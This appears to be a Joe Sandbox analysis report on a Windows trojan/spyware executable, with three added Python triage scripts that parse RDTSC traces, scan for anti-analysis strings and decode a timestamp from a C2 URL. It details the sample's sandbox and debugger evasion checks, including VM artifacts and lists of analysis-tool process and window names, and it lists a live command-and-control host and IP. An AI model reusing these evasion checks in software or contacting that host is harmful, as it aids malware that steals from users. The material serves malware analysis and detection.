Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 7110890 second address: 71108A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, 641Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 71108A4 second address: 71108A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 71108A8 second address: 71108AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 71108AC second address: 71108B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 71108B2 second address: 71108C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED6601h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B0975 second address: 70B0990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FBCB0E4CF6Eh 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B0990 second address: 70B0996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B0996 second address: 70B099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B099C second address: 70B09A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B09A0 second address: 70B09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B09B0 second address: 70B09B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B09B6 second address: 70B09C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov cx, C07Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B09C8 second address: 70B09CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 70B09CF second address: 70B09D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
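The interceptor lines above are the evidence behind the "Tries to detect virtualization through RDTSC time measurements" verdict. Each line records two consecutive rdtsc executions ("First address" and "second address") and the instructions the sandbox saw executed between them; the second address of one line is the first address of the next, so the lines form chains of back-to-back reads (71213B4 through 7121479, 712152C through 71215B9, and so on). The offsets in the instruction column are cumulative byte lengths of the executed trace, which is why the address distance is larger than the trace length whenever a call or jmp sits between the two reads. The script below is an added example, not part of the report or of Joe Sandbox: it parses lines in this format, rebuilds the chains and reports, per pair, how many filler instructions separate the reads and whether execution between them was linear. Its input is three lines copied from this report.

```python
import re

# Three interceptor lines copied from this report (sample input, not new data).
SAMPLE_LINES = [
    "RDTSC instruction interceptor: First address: 71213B4 second address: 71213DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FBCB0ED6603h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+2Ch], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, 052BEB27h 0x0000001a mov ebx, esi 0x0000001c popad 0x0000001d rdtsc",
    "RDTSC instruction interceptor: First address: 71213DF second address: 712140F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBCB0E4CF6Dh 0x00000014 rdtsc",
    "RDTSC instruction interceptor: First address: 712152C second address: 7121530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
]

HEADER_RE = re.compile(
    r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.*)$"
)
# One executed instruction: "0x<offset> <text>", running up to the next offset token.
INSN_RE = re.compile(r"0x([0-9a-fA-F]{8}) (.*?)(?= 0x[0-9a-fA-F]{8} |$)")


def parse_line(line):
    """Return first/second rdtsc addresses and the (offset, text) trace between them."""
    m = HEADER_RE.search(line)
    if m is None:
        raise ValueError("not an RDTSC interceptor line")
    insns = [(int(off, 16), text.strip()) for off, text in INSN_RE.findall(m.group(3))]
    return {"first": int(m.group(1), 16), "second": int(m.group(2), 16), "insns": insns}


def summarize(rec):
    """Describe one read pair: filler count, trace length, and whether flow was linear."""
    insns = rec["insns"]
    if len(insns) < 2 or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        raise ValueError("trace must start and end with rdtsc")
    mnemonics = [text.split()[0] for _, text in insns]
    transfers = [m for m in mnemonics if m in ("call", "ret") or m.startswith("j")]
    trace_bytes = insns[-1][0]            # bytes of code executed before the second read
    addr_delta = rec["second"] - rec["first"]
    return {
        "first": rec["first"],
        "second": rec["second"],
        "between": len(insns) - 2,        # filler instructions between the two reads
        "trace_bytes": trace_bytes,
        "addr_delta": addr_delta,
        "linear": addr_delta == trace_bytes,  # False when a call/jmp redirected the flow
        "transfers": transfers,
    }


def chains(records):
    """Group records whose second address is the next record's first address."""
    out, cur = [], []
    for rec in records:
        if cur and cur[-1]["second"] != rec["first"]:
            out.append(cur)
            cur = []
        cur.append(rec)
    if cur:
        out.append(cur)
    return out


def analyze(lines):
    """Parse interceptor lines and return one list of pair summaries per chain."""
    return [[summarize(r) for r in c] for c in chains(parse_line(l) for l in lines)]


if __name__ == "__main__":
    for chain in analyze(SAMPLE_LINES):
        print("chain of %d read pairs starting at %X" % (len(chain), chain[0]["first"]))
        for s in chain:
            print("  %X -> %X: %d filler insns, linear=%s, transfers=%s"
                  % (s["first"], s["second"], s["between"], s["linear"], s["transfers"]))
```

Running it over the full set of 24 lines from this report (paste them into SAMPLE_LINES) shows four separate chains, one per code region (0x71213B4, 0x712152C, 0x7110889 and 0x70B0975), each consisting of short rdtsc pairs padded with stack and register noise that does not affect the measured delta.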
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Special instruction interceptor: First address: AA19BC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Special instruction interceptor: First address: C47BAD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Special instruction interceptor: First address: A9F0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Special instruction interceptor: First address: CD6885 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_005A9980 rdtsc 0_2_005A9980
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003C255D
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003C29FF
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_003C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003C255D
Source: PqHnYMj5eF.exe, 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: PqHnYMj5eF.exe | Binary or memory string: Hyper-V RAW
Source: PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: PqHnYMj5eF.exe, 00000000.00000003.1473376071.000000000183D000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1473426968.000000000184B000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494800795.000000000184C000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1473259309.0000000001830000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhe
Source: PqHnYMj5eF.exe, 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: PqHnYMj5eF.exe, 00000000.00000003.1332343712.00000000017E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File opened: NTICE
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File opened: SICE
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Code function: 0_2_005A9980 rdtsc 0_2_005A9980
Source: PqHnYMj5eF.exe, 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe
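The evasion evidence in the two sections above reduces to a fixed set of strings the sample carries: VirtualBox registry and file paths, analysis-tool process names (WINDBG.EXE, wireshark.exe, procmon.exe, x64dbg.exe, ida.exe), window classes and titles looked up with FindWindow (regmonclass, filemonclass, procmon_window_class, ollydbg), the SoftICE driver device names NTICE, SICE and SIWVID, and the Oreans.vxd / Software\WinLicense strings of the WinLicense/Themida protector runtime, which is consistent with the .taggant entry-point section, the self-modifying code and the rdtsc chains. The scanner below is an added example, not part of the report or of Joe Sandbox: it runs a minimal strings pass (ASCII and UTF-16LE) over a binary blob and reports which indicator classes from this report are present. Two things are assumptions rather than report facts: the \\.\ device prefix on the SoftICE names (the report only shows "File opened: NTICE"; the Oreans.vxd string does appear with that prefix), and the UTF-16LE variants. One caveat a triage analyst should apply: the "Hyper-V RAW" string the report lists as a VM indicator sits next to "%SystemRoot%\system32\mswsock.dll" in the memory dumps, which is the Winsock catalog entry for the Hyper-V socket provider present on every stock Windows 10 install, so it is deliberately left out of the indicator list. The sample blob is constructed for the demonstration.

```python
import re

# Indicator strings taken from this report's own signature output, grouped by class.
INDICATORS = {
    "vm_artifact": [
        r"HARDWARE\ACPI\DSDT\VBOX__",
        r"SYSTEM\ControlSet001\Services\VBoxSF",
        r"C:\Windows\System32\VBox",
    ],
    "analysis_tool_process": ["WINDBG.EXE", "wireshark.exe", "procmon.exe", "x64dbg.exe", "ida.exe"],
    "analysis_tool_window": [
        "regmonclass", "filemonclass", "procmon_window_class", "ollydbg", "gbdyllo",
        "process monitor - sysinternals", "registry monitor - sysinternals",
        "file monitor - sysinternals",
    ],
    # The report shows "File opened: NTICE/SICE/SIWVID"; the \\.\ device prefix is assumed.
    "softice_device": [r"\\.\NTICE", r"\\.\SICE", r"\\.\SIWVID"],
    "protector_runtime": [r"\\.\Oreans.vxd", r"Software\WinLicense"],
}
# Deliberately excluded: "Hyper-V RAW" is the Winsock catalog name of the Hyper-V
# socket provider in mswsock.dll and is present on any Windows 10 host.

ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")   # UTF-16LE printable runs


def extract_strings(blob):
    """Minimal 'strings': printable ASCII runs plus UTF-16LE runs, 4+ chars."""
    found = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    found += [m.group().decode("utf-16le") for m in WIDE_RUN.finditer(blob)]
    return found


def scan(blob):
    """Return {indicator_class: [matched indicators]} for the blob, case-insensitive."""
    haystack = [s.lower() for s in extract_strings(blob)]
    hits = {}
    for category, needles in INDICATORS.items():
        for needle in needles:
            n = needle.lower()
            if any(n in s for s in haystack):
                hits.setdefault(category, []).append(needle)
    return hits


def classify(hits):
    """Two or more independent indicator classes is the bar used here for 'evasive'."""
    if len(hits) >= 2:
        return "evasive"
    return "weak" if hits else "none"


# Constructed sample blob: one ASCII VM artifact, one UTF-16LE window class, one
# SoftICE device path, and the benign Winsock catalog string that must NOT count.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"SYSTEM\\ControlSet001\\Services\\VBoxSF\x00\x00"
    + "procmon_window_class".encode("utf-16le") + b"\x00\x00"
    + b"\\\\.\\SICE\x00\x00"
    + b"Hyper-V RAW%SystemRoot%\\system32\\mswsock.dll\x00\x00"
    + b"\xff" * 8
)

if __name__ == "__main__":
    hits = scan(SAMPLE_BLOB)
    for category, matched in sorted(hits.items()):
        print("%-22s %s" % (category, ", ".join(matched)))
    print("verdict:", classify(hits))
```

Short names such as ida.exe will also match longer file names that happen to end the same way; the classification threshold of two independent classes is there so a single coincidental string does not flip the verdict.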

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49710 -> 5.101.3.217:80
ATT&CK matrix by tactic (the number in front of a technique is the count the report attaches to it; techniques without a number are the matrix's standard placeholders and were not observed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
PqHnYMj5eF.exe | 47% | ReversingLabs | Win32.Trojan.Generic
PqHnYMj5eF.exe | 32% | Virustotal | -
PqHnYMj5eF.exe | 100% | Avira | TR/Crypt.TPM.Gen
PqHnYMj5eF.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseiN | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | - | high
httpbin.org | 3.218.7.103 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lseiN | PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1494057055.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html | PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
https://curl.se/docs/alt-svc.html# | PqHnYMj5eF.exe | false | - | high
https://httpbin.org/ipbefore | PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
https://curl.se/docs/http-cookies.html | PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
https://curl.se/docs/hsts.html# | PqHnYMj5eF.exe | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | PqHnYMj5eF.exe, 00000000.00000003.1474338396.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000003.1474358752.00000000017D8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://.css | PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://.jpg | PqHnYMj5eF.exe, 00000000.00000003.1291667944.0000000007390000.00000004.00001000.00020000.00000000.sdmp, PqHnYMj5eF.exe, 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
5.101.3.217 | home.fiveth5ht.top | Russian Federation (RU) | 34665 | PINDC-AS | false
3.218.7.103 | httpbin.org | United States (US) | 14618 | AMAZON-AES | false
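Two observations about the network indicators above that a triage analyst should separate. First, the curl.se documentation URLs and the "http://.css" / "http://.jpg" fragments are libcurl's own built-in strings, so they indicate a statically linked libcurl rather than further infrastructure, and https://httpbin.org/ip simply echoes the caller's public IP. Second, the only real contact is the fixed path under home.fiveth5ht.top, which the context tables show being reused verbatim by seven other samples, and that path ends in a ten-digit run. Reading that run as a Unix epoch is an assumption (the report does not say what it is); the check below, which is an added example and not part of the report, decodes it and compares it with the PE header time stamp the static section of this report gives (0x676CDB5F, Thu Dec 26 04:28:15 2024 UTC), so the reader can judge for themselves how closely the two line up. It also copes with the memory-residue variants of the URL (trailing "6963" and "lseiN") and with the truncated "...SXF17" form.

```python
import re
from datetime import datetime, timezone

# Values copied from this report: the contacted URL and the PE header time stamp.
C2_URL = "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862"
PE_TIMESTAMP = 0x676CDB5F

# Last path segment = alphabetic prefix + ten-digit run + whatever residue follows.
TOKEN_RE = re.compile(r"([A-Za-z]+)(\d{10})(.*)")


def split_path_token(url):
    """Return (prefix, ten_digit_int, residue) for the last path segment, or None."""
    segment = url.rsplit("/", 1)[-1]
    m = TOKEN_RE.fullmatch(segment)
    if m is None:
        return None
    return m.group(1), int(m.group(2)), m.group(3)


def epoch_to_utc(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def compare_with_pe(url, pe_ts):
    """Decode the URL's digit run as a Unix epoch (assumed) and diff it against the PE time stamp."""
    tok = split_path_token(url)
    if tok is None:
        return None
    prefix, epoch, residue = tok
    return {
        "prefix": prefix,
        "epoch": epoch,
        "residue": residue,
        "url_time": epoch_to_utc(epoch).isoformat(),
        "pe_time": epoch_to_utc(pe_ts).isoformat(),
        "delta_seconds": pe_ts - epoch,   # positive: PE was stamped after the URL epoch
    }


if __name__ == "__main__":
    for u in (C2_URL,
              C2_URL + "6963",                       # residue variant from the memory dumps
              "http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17"):  # truncated variant
        print(u)
        print("   ", compare_with_pe(u, PE_TIMESTAMP))
```

For the report's URL the decoded value is 2024-12-26T04:21:02Z, 433 seconds before the PE time stamp; whether that means the path token was generated at build time is for the analyst to weigh, but the same token recurring unchanged across the related samples in the context tables makes it a stable pivot either way.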
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1581243
                          Start date and time:2024-12-27 09:01:01 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 6s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:5
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:PqHnYMj5eF.exe
                          renamed because original name is a hash value
                          Original Sample Name:5a249494869b3ef440bd31b438958585.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
